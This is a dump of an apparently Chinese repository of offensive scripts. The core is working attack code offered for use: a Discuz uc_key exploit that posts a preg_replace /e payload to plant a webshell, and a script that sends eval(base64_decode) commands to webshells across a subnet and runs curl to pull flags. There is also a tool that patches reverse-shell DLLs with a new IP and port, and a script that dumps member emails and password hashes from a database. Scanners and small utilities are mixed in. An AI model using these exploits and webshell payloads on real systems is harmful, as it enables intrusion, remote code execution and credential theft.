    # evidence that a host is patched.
    except:
        body=""
    if "nMask" in body:
        print "[Loopholes exist]",url
        # Shared file object written from many threads with no lock visible
        # here; lines from concurrent hits may interleave.
        f.write(url+"\n")
    else:
        print "Loopholes not exist",url
if __name__=="__main__":
    # The string below is a no-op expression used as a comment. In English:
    # url.txt is the list of URLs to check; result.txt receives the results.
    '''
    url.txt为待检测url列表
    result.txt为检测完输出结果文件
    '''
    # Opened in append mode and never closed or flushed explicitly in this script.
    f=open("result.txt","a")
    url_list=[i.replace("\n","") for i in open("url.txt","r").readlines()]
    for url in url_list:
        threading.Thread(target=poc,args=(url,)).start()
        # Throttle: spin until fewer than 50 threads are alive before starting
        # the next one. This is a busy-wait with no sleep.
        while 1:
            if(len(threading.enumerate())<50):
                break
-------------------------------------------------------------------------------- /struts2批量查询.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests 4 | a = open("ip.txt","r") 5 | b = ("/index.action","/index.do","/login.do","/login.action") 6 | x = open("success.txt","w") 7 | for c in a: 8 |         d = c.strip() 9 |         for e in b: 10 |                 g = requests.get(str(d) + str(e)) 11 |                 print g.url 12 |                 if g.status_code == 200: 13 |                         print>>x,g.url         14 | a.close() 15 | x.close() 16 | -------------------------------------------------------------------------------- /t00lsAddTu/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/evn python 2 | # -*- coding:utf-8 -*- 3 | # author t0ols 4 | 5 | # 域名 6 | DOMAIN = r'https://www.t00ls.net/' # 域名必须用/结束,不然与下面的拼接不成功 7 | USERNAME = 'xxxxx' #用户名 8 | PASSWORD = 'xxxx' #密码 9 | QUESTIONID = 5 # 0 空 1 母亲的名字 2 爷爷的名字 3 父亲出生的城市 4 您其中一位老师的名字 5您个人计算机的型号 6 您最喜欢的餐馆名称 7 驾驶执照的最后四位数字 10 | ANSWER = 'xxxx' #答案 11 | LOGINFIELD = r'用户名' #用户名 12 | COOKIETIME = 2592000 13 | 14 | HOMEURL = DOMAIN + r't00ls_domain.php' 15 | CHECKURL = DOMAIN + r'members-tubilog-xxxxx.html' #这里记得一定要修改才行的 16 | LOGINURL = DOMAIN + r'logging.php?action=login&infloat=yes&handlekey=login&inajax=1&ajaxtarget=fwin_content_login' 17 | -------------------------------------------------------------------------------- /t00lsAddTu/config.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/t00lsAddTu/config.pyc -------------------------------------------------------------------------------- /t00lsAddTu/discuz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/evn python 2 | # -*- 
coding:utf-8 -*- 3 | # author t0ols 4 | 5 | import re 6 | import requests 7 | import config 8 | import hashlib 9 | from bs4 import BeautifulSoup 10 | import time 11 | import random 12 | 13 | 14 | class Discuz(object): 15 | def __init__(self): 16 | self.nowDate = time.strftime('%Y-%m-%d', time.localtime(time.time())) 17 | self.operate = '' # response的对象(不含read) 18 | self.formhash = '' # 没有formhash不能发帖 19 | 20 | self.s = requests.session() 21 | # self.formhash_pattern = re.compile(r'') 22 | self.formhash_pattern = re.compile(r'') 23 | UA = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 24 | self.header = {"User-Agent": UA, 25 | "Referer": "https://www.t00ls.net/", 26 | } 27 | self.url = 'https://www.t00ls.net/logging.php?action=login&infloat=yes&handlekey=login&inajax=1&ajaxtarget=fwin_content_login' 28 | 29 | def login(self, username, password, questionid, answer): 30 | md5 = hashlib.md5() 31 | md5.update(password.encode('utf-8')) 32 | password = md5.hexdigest() 33 | getFormhashHtml = self.s.get(self.url, headers=self.header) 34 | formhashBS4 = BeautifulSoup(getFormhashHtml.text, 'lxml') 35 | formhash = formhashBS4.find('input', {'name': 'formhash'})['value'] 36 | 37 | loginData = { 38 | 'formhas': formhash, 39 | 'referer': self.url, 40 | 'loginfield': config.LOGINFIELD, # username or email 41 | 'username': username, 42 | 'password': password, 43 | 'questionid': questionid, 44 | 'answer': answer, 45 | 'loginsubmit': 'true', 46 | 'cookietime': config.COOKIETIME, 47 | } 48 | self.s.post(self.url, headers=self.header, data=loginData) 49 | Cookie = "UTH_cookietime=2592000; UTH_auth={UTH_auth}; UTH_sid={UTH_sid}".format( 50 | UTH_auth=self.s.cookies['UTH_auth'], 51 | UTH_sid=self.s.cookies['UTH_sid']) 52 | self.header['Cookie'] = Cookie 53 | 54 | def check(self): 55 | selectTB = self.s.get(config.CHECKURL, headers=self.header).content 56 | soup = BeautifulSoup(selectTB, 'lxml') 57 | tbody = 
soup.find('tbody') 58 | for item in tbody.findAll('tr'): 59 | # print item 60 | if self.nowDate in item.text and u'域名' in item.text: 61 | print '*' * 30 62 | print '今日土币已领完,请明日继续!' 63 | print '详细信息:' 64 | print item.text 65 | print '*' * 30 66 | exit() 67 | 68 | def cha(self, domain): 69 | print '[+] Checking {}'.format(domain) 70 | getFormhashHtml = self.s.get(config.HOMEURL, headers=self.header) 71 | formhashBS4 = BeautifulSoup(getFormhashHtml.text, 'lxml') 72 | formhash_cha = formhashBS4.findAll('input', {'name': 'formhash'}) 73 | formhash_cha = formhash_cha[0]['value'] 74 | # print formhash_cha 75 | 76 | data = {'querydomainsubmit': '\xe6\x9f\xa5\xe8\xaf\xa2', 'domain': u'Rockislandauction.com', 77 | 'formhash': '31d70cec',} 78 | data['domain'] = domain 79 | data['formhash'] = formhash_cha 80 | data['querydomainsubmit'] = u'查询' 81 | 82 | html = self.s.post(config.HOMEURL, headers=self.header, data=data).text 83 | # print html 84 | if u'注册信息' in html: 85 | print '{} 查询成功!'.format(domain) 86 | 87 | def getDomain(self): 88 | url = 'http://www.alexa.com/topsites/category;{}/Top/Business/Business_Services'.format(random.randint(1, 19)) 89 | # url='http://www.alexa.com/topsites/category;19/Top/Business/Business_Services/Communications' 90 | soup = BeautifulSoup(requests.get(url).content, 'lxml') 91 | domainList = [] 92 | for item in soup.find_all('p', attrs={'class': 'desc-paragraph'}): 93 | doamin = item.a.get_text().replace('/', '').replace('Https:', '').replace('http:', '') 94 | domainList.append(doamin) 95 | return domainList 96 | -------------------------------------------------------------------------------- /t00lsAddTu/discuz.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/t00lsAddTu/discuz.pyc -------------------------------------------------------------------------------- /t00lsAddTu/login.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/evn python 2 | # -*- coding:utf-8 -*- 3 | # author t0ols 4 | 5 | import config 6 | import discuz 7 | 8 | if __name__ == '__main__': 9 | try: 10 | my_account = discuz.Discuz() # 实例化对象 11 | my_account.login(config.USERNAME, config.PASSWORD, config.QUESTIONID, config.ANSWER) # 从配置文件中把相关参数传过去 12 | for item in my_account.getDomain(): 13 | my_account.cha(item) 14 | my_account.check() 15 | except Exception as e: 16 | print e 17 | -------------------------------------------------------------------------------- /url.py: -------------------------------------------------------------------------------- 1 | #! usr/bin/env python 2 | #coding = UTF-8 3 | 4 | import os 5 | import re 6 | 7 | print ''' 8 | ================================================================== 9 | = By: Barrett = 10 | = QQ: 2463917215 = 11 | = Oursite:bbs.blackbap.org = 12 | ================================================================== 13 | ''' 14 | 15 | if __name__ == '__main__': 16 | try: 17 | url = open('url.txt', 'r') 18 | except: 19 | print 'you do not have the file url.txt' 20 | else: 21 | tmp = [tmp.split('?')[0] for tmp in url] 22 | tmp = {}.fromkeys(tmp).keys() 23 | nex = '\n' 24 | result = open('result.txt', 'w') 25 | result.write(nex.join(tmp)) 26 | result.close() 27 | 28 | -------------------------------------------------------------------------------- /weakfilescan.txt: -------------------------------------------------------------------------------- 1 | if __name__ == "__main__": 2 | if len(sys.argv) == 2: 3 | print '2' 4 | print json.dumps(start_wyspider(sys.argv[1]), indent=2) 5 | sys.exit(0) 6 | elif len(sys.argv)==3: 7 | for i in open(sys.argv[2]): 8 | print i 9 | print json.dumps(start_wyspider(str(i).strip()), indent=2) 10 | sys.exit(0) 11 | else: 12 | print ("usage: %s http://wuyun.org" % sys.argv[0]) 13 | print ("usage: %s -u url.txt" % sys.argv[0]) 14 | sys.exit(-1) 15 | 16 | if 
__name__ == "__main__": 17 | f = file("result.txt","a+") 18 | result = "test" 19 | if len(sys.argv) == 2: 20 | result = json.dumps(start_wyspider(sys.argv[1]), indent=2) 21 | f.write(result) 22 | print result 23 | sys.exit(0) 24 | elif len(sys.argv)==3: 25 | for i in open(sys.argv[2]): 26 | result = json.dumps(start_wyspider(str(i).strip()), indent=2) 27 | f.write(result) 28 | print result 29 | sys.exit(0) 30 | else: 31 | print ("usage: %s http://wuyun.org" % sys.argv[0]) 32 | print ("usage: %s -u url.txt" % sys.argv[0]) 33 | sys.exit(-1) 34 | 加了点代码 35 | 扫描完成后会写入结果在当前目录,生成文件result.txt(代码很搓,有点冗余) 36 | 加了个用法:python wyspider.py -u url.txt (从当前目录url.txt循环取url然后开始扫描) -------------------------------------------------------------------------------- /webshell下远程连接linux服务器并执行命令工具/plink.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/webshell下远程连接linux服务器并执行命令工具/plink.exe -------------------------------------------------------------------------------- /webshell下远程连接linux服务器并执行命令工具/plink用法.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/webshell下远程连接linux服务器并执行命令工具/plink用法.txt -------------------------------------------------------------------------------- /一个小脚本查看PC连接过的WIFI密码.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/一个小脚本查看PC连接过的WIFI密码.bat -------------------------------------------------------------------------------- /一键实现--强制通过VPN上网,VPN断线就断网.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | TITLE Set forced through the VPN to the Internet , plz run as administrator! by t00ls.net 3 | :menu 4 | echo. 
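echo ===============================================================================
echo.
echo 1. Set forced through the VPN to the Internet , plz run as administrator
echo 2. Delete your setttings in 1 , plz run as administrator
echo 3. Query your settings IP
echo 4. exit
echo. by t00ls.net
echo.

rem "set /p" keeps the previous value when the user only presses Enter,
rem so clear the variable first or the last choice would silently run again.
set "select="
set /p select=plz select:
if /i "%select%"=="1" goto 1
if /i "%select%"=="2" goto 2
if /i "%select%"=="3" goto 3
if /i "%select%"=="4" goto 4
rem Unknown choice: return to the menu instead of re-launching the script.
echo error select&pause&goto menu
:1
rem Option 1: allow outbound traffic only to the VPN server address(es) and
rem over RAS (dial-up/VPN) interfaces, then block every other outbound flow.
echo.
echo Examples:
echo 10.0.0.1 or 10.0.0.1-10.0.0.254 or 10.0.0.1/24
echo 10.0.0.1,192.168.1.1,10.10.10.0/24
echo use , to separate multiple IPs
echo.
set "ip="
set /p ip=Set Your IP Address:
rem With an empty address the allow rule cannot be created; switching the
rem default policy to block would then cut the machine off completely.
if not defined ip (
    echo No IP address entered, firewall left unchanged.
    goto menu
)
rem Create the allow rules first and switch the default outbound policy to
rem block only after both exist. This assumes netsh reports a failure, such
rem as a missing elevation, through a non-zero errorlevel.
echo netsh advfirewall firewall add rule name="allowvpn1" dir=out action=allow enable=yes remoteip="%ip%"
netsh advfirewall firewall add rule name="allowvpn1" dir=out action=allow enable=yes remoteip="%ip%"
if errorlevel 1 (
    echo Could not add rule allowvpn1, firewall policy left unchanged.
    goto menu
)
echo netsh advfirewall firewall add rule name="allowvpnremote1" dir=out action=allow enable=yes interfacetype=ras
netsh advfirewall firewall add rule name="allowvpnremote1" dir=out action=allow enable=yes interfacetype=ras
if errorlevel 1 (
    echo Could not add rule allowvpnremote1, firewall policy left unchanged.
    netsh advfirewall firewall delete rule name="allowvpn1"
    goto menu
)
echo netsh advfirewall set allprofiles firewallpolicy allowinbound,blockoutbound
netsh advfirewall set allprofiles firewallpolicy allowinbound,blockoutbound
goto menu

:2
rem Option 2: restore the permissive outbound policy, then remove both rules
rem that option 1 created.
echo.
echo netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
echo netsh advfirewall firewall delete rule name="allowvpn1"
netsh advfirewall firewall delete rule name="allowvpn1"
echo netsh advfirewall firewall delete rule name="allowvpnremote1"
netsh advfirewall firewall delete rule name="allowvpnremote1"
goto menu

:3
echo.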
48 | echo You have set the IP 49 | netsh advfirewall firewall show rule name="allowvpn1" |findstr IP 50 | if %errorlevel% NEQ 0 (echo. 51 | echo ----Not Found IP---- 52 | echo. 53 | echo.) else echo. 54 | goto menu 55 | 56 | :4 57 | exit -------------------------------------------------------------------------------- /全自动脱裤脚本.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 1,先给目标表减肥 (目的是把无用的字段去掉,减小体积) 4 | 5 | CREATE TABLE user4 AS SELECT uid,name,email,members_pass FROM ips_members; 6 | 7 | " . $row['testtext']; 41 | echo "
    "; 42 | file_put_contents('D:/www/all.txt',implode(' ',$row)."\r\n",FILE_APPEND); 43 | } 44 | } 45 | 46 | $ifgoon = $ifgoon-1; 47 | if($ifgoon>0){ 48 | $startloc = $startloc + $selectnum; 49 | $locurl = "http://localhost/test.php?selectnum=".$selectnum."&startloc=".$startloc."&ifgoon=".$ifgoon; 50 | echo $locurl; 51 | echo ""; 54 | } 55 | } 56 | 57 | 58 | ?> 59 | 60 |
    61 | 查询条数: 62 | 63 |
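    #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Forsaken
"""去重可排序.py - remove duplicate lines from a text file, optionally sorted.

The result is written next to the input file as ``new_<name>``; the input
file itself is never modified.
"""

import getopt
import os
import sys


def _unique_lines(lines):
    """Return *lines* without duplicates, keeping the first-seen order."""
    seen = set()
    unique = []
    for line in lines:
        # Set membership keeps this linear; scanning the result list for
        # every line is quadratic and very slow on large word lists.
        if line not in seen:
            seen.add(line)
            unique.append(line)
    return unique


def main():
    """Parse the command line, de-duplicate the file and write ``new_<name>``.

    Exit codes: 2 for bad or missing arguments, 1 when the input path is not
    an existing regular file.
    """
    try:
        opts, _args = getopt.getopt(sys.argv[1:], 'hf:s',
                                    ['help', 'file=', 'sort'])
    except getopt.GetoptError as e:
        print('[-] %s' % e)
        usage()
        sys.exit(2)

    path = ''
    sort = False

    for opt, value in opts:
        if opt in ('-h', '--help'):
            usage()
            sys.exit()
        elif opt in ('-f', '--file'):
            path = value
        elif opt in ('-s', '--sort'):
            sort = True

    if not path:
        print('[-] File Arguments Not Found!')
        usage()
        sys.exit(2)

    # isfile() rather than exists(): a directory exists but cannot be read
    # as a list of lines.
    if not os.path.isfile(path):
        print('[-] File Not Found!')
        sys.exit(1)

    with open(path, 'r') as f:
        old = f.readlines()

    # A final line without a newline would otherwise count as different from
    # the same text earlier in the file, and would be glued to the following
    # line once the list is sorted.
    if old and not old[-1].endswith('\n'):
        old[-1] += '\n'

    new = _unique_lines(old)
    delete = len(old) - len(new)

    if sort:
        new.sort()

    # Prefix the file name, not the whole argument, so "-f dir/words.txt"
    # writes dir/new_words.txt instead of failing on "new_dir/words.txt".
    directory, name = os.path.split(path)
    out = os.path.join(directory, 'new_' + name)
    with open(out, 'w') as f:
        f.writelines(new)

    print('Delete %s Line' % delete)
    print('Please Check %s' % out)


def usage():
    """Print the command-line help text."""
    print('Usage: python %s [options]' % sys.argv[0])
    print('')
    print('Options:')
    print(' -h, --help Show Help Message And Exit')
    print(' -f FILE, --file=FILE File')
    print(' -s, --sort Sort')


if __name__ == '__main__':
    main()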
-------------------------------------------------------------------------------- /反弹dll ip修改小脚本(445 NC).py: -------------------------------------------------------------------------------- 1 | # -*- coding: cp936 -*- 2 | import re 3 | print "反弹dll 连接信息 修改小工具 by:jonyer" 4 | 5 | 6 | with open (raw_input("dll :"),'rb+')as f: 7 | byte=f.read().encode('hex') 8 | ip1=re.findall("76740000(.*?)0063",byte) 9 | print ip1[0].decode('hex') 10 | 11 | 12 | 13 | port=raw_input("port :").encode('hex') 14 | ip=raw_input("ip :").encode('hex') 15 | 16 | while len(port) <8: 17 | port+="00" 18 | if len(port) >= 8: 19 | 20 | pass 21 | while len(ip) <30: 22 | ip+="00" 23 | if len(ip) >= 30: 24 | 25 | pass 26 | 27 | 28 | 29 | length=len(ip1[0])-len(port+ip) 30 | zero=port+"0"*length+ip 31 | print zero.decode('hex') 32 | 33 | 34 | 35 | kkk=byte.replace(ip1[0],zero) 36 | f.seek(0) 37 | f.truncate(0) 38 | f.write(bytes(kkk.decode('hex'))) 39 | f.close() 40 | print "OK" 41 | raw_input('按回车键退出 :') -------------------------------------------------------------------------------- /在一堆文本中提取出 域名(脚本).php: -------------------------------------------------------------------------------- 1 | 0){ 14 | $domain_name=empty($domain[0])?'':trim($domain[0]); 15 | if(strlen($domain_name)>0){ 16 | $domain_name=@trim($domain_name,'/'); 17 | $domain_name=@trim($domain_name,'-'); 18 | $domain_name=@trim($domain_name,'_'); 19 | return $domain_name; 20 | } 21 | } 22 | } 23 | 24 | foreach (glob("./txt/*.txt") as $filename) { 25 | foreach (file ($filename) as $str){ 26 | echo domain(trim($str)).PHP_EOL; 27 | } 28 | 29 | } 30 | ?> -------------------------------------------------------------------------------- /处理awvs10.5扫描结果xml文件的py脚本: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/处理awvs10.5扫描结果xml文件的py脚本 -------------------------------------------------------------------------------- 
/字典加dz uc_key getshell/discuz_getshell.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import hashlib 3 | import time 4 | import math 5 | import base64 6 | import urllib2 7 | import urllib 8 | import re 9 | import requests 10 | import json 11 | global cookie 12 | global formhash 13 | def microtime(get_as_float = False) : 14 | if get_as_float: 15 | return time.time() 16 | else: 17 | return '%.8f %d' % math.modf(time.time()) 18 | def get_authcode(string, key = ''): 19 | ckey_length = 4 20 | key = hashlib.md5(key).hexdigest() 21 | keya = hashlib.md5(key[0:16]).hexdigest() 22 | keyb = hashlib.md5(key[16:32]).hexdigest() 23 | keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] 24 | cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 25 | key_length = len(cryptkey) 26 | string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string 27 | string_length = len(string) 28 | result = '' 29 | box = range(0, 256) 30 | rndkey = dict() 31 | for i in range(0,256): 32 | rndkey[i] = ord(cryptkey[i % key_length]) 33 | j=0 34 | for i in range(0,256): 35 | j = (j + box[i] + rndkey[i]) % 256 36 | tmp = box[i] 37 | box[i] = box[j] 38 | box[j] = tmp 39 | a=0 40 | j=0 41 | for i in range(0,string_length): 42 | a = (a + 1) % 256 43 | j = (j + box[a]) % 256 44 | tmp = box[a] 45 | box[a] = box[j] 46 | box[j] = tmp 47 | result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) 48 | length=len(result) 49 | return keyc + base64.b64encode(result).replace('=', '') 50 | def get_cookie_formhash(host): 51 | global cookie 52 | global formhash 53 | headers = {'content-type': 'application/json'} 54 | r=requests.get(host,headers=headers) 55 | cookie=r.cookies 56 | hash=re.findall(r'formhash" value="[0-9A-z]{1,10}"',r.text) 57 | _formhash=re.findall(r'"[0-9A-z]{1,10}"',hash[0]) 58 | formhash=_formhash[0].replace('"','') 59 | def getshell(host,key): 60 | global cookie 61 | global formhash 62 | header = {'User-Agent': 
'Mozilla/5.0 (Windows NT 6.1; WOW64)'} 63 | tm=time.time()+10*3600 64 | agent=hashlib.md5("Mozilla/5.0 (Windows NT 6.1; WOW64)") 65 | string="agent=%s&time=%s&action=updatebadwords" % (agent,tm) 66 | code=urllib.quote(get_authcode(string,key)) 67 | get_cookie_formhash(host) 68 | url="%s/api/uc.php?code=%s&formhash=%s" % (host,code,formhash) 69 | payload=''' 70 | 71 | 72 | /admin/e 73 | @preg_replace(chr(47).chr(47).chr(101),$_POST[c],chr(098)); 74 | 75 | ''' 76 | r=requests.post(url,data=payload,cookies=cookie,headers=header) 77 | print url 78 | print r.text 79 | if re.findall('^1',r.text): 80 | print 'success shell is %s/forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin password is c' % (host) 81 | if __name__ == '__main__': 82 | commands=sys.argv[1:2] 83 | keys=sys.argv[2:] 84 | args="".join(commands) 85 | argss="".join(keys) 86 | print args,argss 87 | if len(args) < 5: 88 | sys.exit() 89 | else: 90 | getshell(args,argss) -------------------------------------------------------------------------------- /字典加dz uc_key getshell/字典.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/字典加dz uc_key getshell/字典.rar -------------------------------------------------------------------------------- /导出浏览器密码.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/导出浏览器密码.py -------------------------------------------------------------------------------- /弱编码MD5小脚本py.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import re 3 | 4 | month = ['01','02','03','04','05','06','07','08','09','10','11','12'] 5 | 6 | def days(): 7 | days_tmp = range(10,32) 8 | L=[] 9 | for i in days_tmp: 10 | tmp = str(i) 11 | 
L.append(tmp) 12 | days = month+L 13 | return days 14 | def years(): 15 | year = range(2000,2018) 16 | Y=[] 17 | for i in year: 18 | tmp = str(i) 19 | Y.append(tmp) 20 | return Y 21 | if __name__ == "__main__": 22 | year = years() 23 | day = days() 24 | A=[] 25 | for i in year: 26 | for j in month: 27 | for k in day: 28 | tmp = i+j+k 29 | A.append(tmp) 30 | for i in A: 31 | src = i 32 | m2 = hashlib.md5() 33 | m2.update(src) 34 | ss = m2.hexdigest() 35 | if (re.findall(re.compile(r'c5e61e44f8d'), ss)): 36 | print ss,src -------------------------------------------------------------------------------- /扫描内网IP 对应MAC地址 网卡名字 内网渗透时候可以用到-t00ls.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/扫描内网IP 对应MAC地址 网卡名字 内网渗透时候可以用到-t00ls.rar -------------------------------------------------------------------------------- /批量get flag的python脚本.py: -------------------------------------------------------------------------------- 1 | 脚本使用对象: 2 | 一个c段攻防环境,靶机的漏洞都相同,拿到shell后,想批量get flag的人。 3 | 代码一共两个功能,一个产生shell密码的【ip地址的md5前八位】,一个是批量get flag的【借鉴了菜刀的原理】。 4 | #coding: utf-8 5 | import urllib 6 | import urllib2 7 | from hashlib import md5 8 | import base64 9 | 10 | s0='@eval(base64_decode($_POST[z0]));' 11 | s1=''' 12 | $cmdstr="curl [url]http://10.10.10.1/flag.html[/url]"; 13 | exec($cmdstr,$getkey); 14 | echo var_dump($getkey); 15 | ''' 16 | s1=base64.b64encode(s1) 17 | subip='192.168.126' #config: ip subnet 18 | ip_start=130 #config: sub ip start 19 | ip_end=140 #config: sub ip end 20 | shellpath='/c.php' #config: shell file path 21 | 22 | 23 | def get_shellpass(shellip): 24 | s='' 25 | for i in range(ip_start,ip_end): 26 | ip=shellip+'.'+str(i) 27 | password=md5(ip).hexdigest()[0:8] 28 | print 'ip: '+ip+' | '+'password: '+password 29 | 30 | 31 | def get_flag(flagip,flagpath): 32 | s='' 33 | for i in range(ip_start,ip_end): 34 | ip=flagip+'.'+str(i) 35 | 
password=md5(ip).hexdigest()[0:8] 36 | postdata = password+'='+s0+'&z0='+s1 37 | #print postdata 38 | url='http://'+ip+flagpath 39 | try: 40 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 41 | f = opener.open(url, postdata,timeout=0.5) 42 | #f=urllib2.urlopen(url,timeout=0.5) 43 | ftext=f.read() 44 | if f.getcode()==404: 45 | continue 46 | elif f.text=='': 47 | continue 48 | else: 49 | print '[+] '+ip+': Success!' 50 | s=s+'ip:'+ip+' '+ftext+'\r\n' 51 | continue 52 | except urllib2.URLError, e: 53 | print '[-] '+ip+': Host can not connect.' 54 | continue 55 | re_file=open('log.txt','w+') # write to file 56 | re_file.write(s) 57 | 58 | 59 | def main(): 60 | print '''\r\n-------------------{Shell Password}-----------------\r\n''' 61 | get_shellpass(subip) 62 | print '''\r\n-------------------{Get Flag}-----------------------\r\n''' 63 | get_flag(subip,shellpath) 64 | 65 | 66 | if __name__=='__main__': 67 | main() -------------------------------------------------------------------------------- /批量扫描注入点-小葵.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/批量扫描注入点-小葵.py -------------------------------------------------------------------------------- /批量验证代理ip.py: -------------------------------------------------------------------------------- 1 | 2 | # -*- coding: utf-8 -*- 3 | from bs4 import BeautifulSoup 4 | import sys,requests,lxml,re 5 | #设置 utf8 字符流处理 6 | reload(sys) 7 | sys.setdefaultencoding('utf-8') 8 | 9 | #设置头信息 10 | headers={ "User-Agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36", 11 | "Accept":"*/*", 12 | "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", 13 | "Accept-Encoding":"gzip, deflate", 14 | "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", 15 | "X-Requested-With":"XMLHttpRequest", 16 | "Connection":"keep-alive" 17 | } 
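# Proxy check: proxies() takes a dict mapping a URL scheme to a proxy URL.
def proxies(urls = {"http":"http://124.240.187.78:81"} ):
    """Return *urls* if a probe request through that proxy answers 200, else False.

    The probe is a plain-http GET with a 60 second timeout. A 200 status only
    shows that something answered; it does not show that the proxy relayed the
    request unmodified. Proxies harvested from public lists are untrusted
    intermediaries that can read and alter the traffic sent through them, so
    nothing sensitive should be sent through an entry just because it passed.

    The original call passed verify=False. The probe URL is http, so no
    certificate check ever applied; the flag is dropped here so that it is
    not carried over if the probe is ever pointed at an https URL.
    """
    try:
        res = requests.get(url="http://1212.ip138.com/ic.asp", proxies=urls,
                           timeout=60, headers=headers)
    except Exception:
        # The entries come from a scraped page, so any failure (malformed
        # proxy URL, refused connection, timeout) just marks the proxy unusable.
        print(urls)
        print(u"访问异常,返回0")
        return False

    if res.status_code == 200:
        print(urls)
        print(u"访问没有问题,返回1")
        return urls

    print(urls)
    print(u"访问不可用,返回0")
    return False


# Read the page count of a listing and build the URL of every listing page.
def get_list_page(listurl = "http://www.xicidaili.com/nt/"):
    """Return the URLs of all pages of the listing that starts at *listurl*.

    The page count is taken from the second-to-last number found inside the
    ``div.pagination`` element (presumably the last number belongs to the
    "next page" link; verify against the live markup). An empty list is
    returned when the page has no usable pagination block.
    """
    doc = requests.get(url=listurl, headers=headers, timeout=60).text
    soup = BeautifulSoup(doc, 'lxml')
    pagination = soup.find("div", class_="pagination")
    numbers = re.findall(r"\d+", str(pagination))
    if len(numbers) < 2:
        # No pagination block (layout change, error page or block page):
        # there is nothing to index into.
        return []
    page_max = int(numbers[-2])

    list_all = []
    for i in range(1, page_max + 1):
        # The original passed re.S as the fourth positional argument of
        # re.sub(), which is `count`, not `flags`; the flag is not needed.
        list_all.append(re.sub(r'/\d+', '/%d' % i, listurl + "1"))
    return list_all


# Scrape the proxy table of one listing page.
def page_data(url = "http://www.xicidaili.com/nn/1"):
    """Return one "<scheme>:<scheme>://<host>:<port>" string per table row.

    Columns 1, 2 and 5 of each row are read as host, port and scheme. Rows
    without ``td`` cells, with fewer than six cells, or with a cell that has
    no plain text in one of those columns are skipped.
    """
    resule = []
    html = requests.get(url, headers=headers, timeout=60).text
    soup = BeautifulSoup(html, 'lxml')
    for tr in soup.select('table tr'):
        cells = [td.string for td in tr.select('td')]
        if len(cells) < 6:
            continue
        host, port, scheme = cells[1], cells[2], cells[5]
        if host is None or port is None or scheme is None:
            # .string is None when a cell holds nested markup, not plain text.
            continue
        scheme = scheme.lower()
        resule.append(scheme + ':' + scheme + '://' + host + ':' + port)
    return resule


# Append one record to the result file.
def save_ip(ip):
    """Append the string *ip* to ip.txt; the caller supplies the line ending."""
    with open('ip.txt', 'a') as f:
        # write() rather than writelines(): *ip* is a single string, and the
        # with-block already closes the file.
        f.write(ip)


#proxies()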
#print get_list_page("http://www.xicidaili.com/nn/") 93 | #print page_data() 94 | 95 | 96 | list_url = get_list_page(listurl = "http://www.xicidaili.com/nt/") 97 | for url in list_url: 98 | iplist = page_data(url) 99 | #print iplist 100 | #exit() 101 | for ip in iplist: 102 | arr = re.split(':',ip) 103 | #print type(arr),arr,arr[0],arr[1],arr[2],arr[3] 104 | parame = {arr[0]:arr[1]+':'+arr[2]+':'+arr[3]} 105 | res = proxies(parame) 106 | if res : 107 | #print u"file_put" #写入文件 108 | save_ip(str(arr[1]+':'+arr[2]+':'+arr[3])+"\r\n") 109 | else: 110 | #访问不可用时走这里的流程 111 | pass 112 | 113 | 114 | 115 | 116 | if __name__ == '__main__': 117 | #print "main" 118 | pass -------------------------------------------------------------------------------- /把所有的网关选出来.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/把所有的网关选出来.py -------------------------------------------------------------------------------- /源端口反弹shell.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/源端口反弹shell.py -------------------------------------------------------------------------------- /特殊命令.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/特殊命令.txt -------------------------------------------------------------------------------- 